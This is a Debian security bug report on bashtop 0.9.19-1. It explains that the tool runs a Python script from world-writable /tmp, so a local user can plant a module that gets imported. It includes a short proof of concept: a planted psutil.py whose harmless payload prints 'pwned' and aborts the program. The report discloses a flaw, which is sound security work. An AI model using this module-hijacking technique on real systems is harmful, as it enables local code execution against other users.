Package: bashtop Version: 0.9.19-1 Severity: grave Tags: security
bashtop creates a Python script in /tmp and runs it. But Python adds the directory containing the script to the module search path¹, and /tmp is world-writable, so this in insecure. A local user could plant malicious Python module in /tmp, which would be executed by bashtop.
Proof of concept: $ install -m 644 /path/to/psutil.py /tmp $ bashtop _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || Aborted ¹ https://docs.python.org/3/using/cmdline.html#cmdarg-script -- System Information: Architecture: i386 Versions of packages bashtop depends on: ii bash 5.0-6 ii gawk 1:5.0.1+dfsg-1 ii procps 2:3.3.16-5 Versions of packages bashtop recommends: ii lm-sensors 1:3.6.0-2 un sysstat <none> ii python3-psutil 5.7.0-1 ii curl 7.68.0-1 -- Jakub Wilk
import os; os.system('(tput reset && cowsay pwned) >/dev/tty; kill -ABRT %s' % os.getppid())